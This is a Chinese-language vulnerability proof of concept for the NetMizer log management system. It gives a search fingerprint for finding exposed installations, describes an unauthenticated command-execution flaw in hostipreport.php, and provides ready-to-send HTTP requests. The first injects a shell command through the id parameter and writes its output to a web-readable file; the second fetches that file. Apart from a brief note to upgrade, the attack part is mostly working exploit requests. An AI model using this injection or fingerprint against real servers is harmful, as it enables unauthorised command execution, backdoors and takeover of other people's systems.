一、NetMizer简介

NetMizer日志管理系统是由北京灵州网络技术有限公司开发的网络流量分析与运维工具，专为运营商、数据中心及企业网络设计，主要用于采集、存储和分析网络设备及应用的日志数据。该系统通过实时监控设备运行状态（如CPU、内存、接口流量等）和网络会话日志，提供精细化的流量管理功能，包括按应用协议、主机/IP地址、时间范围等维度统计流量排名，并支持图表化展示与故障告警。其核心模块涵盖异常流量检测（如DDoS攻击）、分区流量分析（如高校或AP分组统计）以及带宽使用优化，同时内置API接口便于与外部系统集成。系统还具备高可用性设计，例如通过光路保护器（NB-104F）实现故障自动旁路切换，并支持外置BYPASS功能保障网络稳定性。然而，该系统曾曝出目录遍历、SQL注入和远程代码执行等安全漏洞，需注意及时升级至官方修复版本以防范风险。

二、指纹

title="NetMizer 日志管理系统"

三、漏洞描述

NetMizer 日志管理系统hostipreport接口处存在命令执行漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令，写入后门，获取服务器权限，进而控制整个web服务器。

四、漏洞复现

GET /data/yxproject/hostipreport.php?action=showtask&id=;id>test123.txt; HTTP/1.1
Host: 
User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

GET /data/yxproject/test123.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip